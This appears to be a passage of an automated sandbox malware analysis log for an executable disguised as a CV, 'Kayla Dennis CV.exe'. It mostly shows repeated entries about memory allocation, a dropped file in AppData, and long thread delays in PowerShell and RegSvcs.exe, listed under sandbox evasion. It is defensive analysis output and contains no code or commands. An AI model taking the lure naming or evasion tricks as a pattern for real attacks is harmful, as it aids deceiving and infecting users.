                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: lyKbfEsVYfQfU.exe PID: 7428, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 3420000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 1A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 96A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: 9860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeMemory allocated: A860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 1500000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 4FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 7DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594240Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599013
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598345
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596434
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5704Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8207Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 665Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1577Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8242Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1542
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8310
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exe TID: 764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594240Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599013
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598345
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765
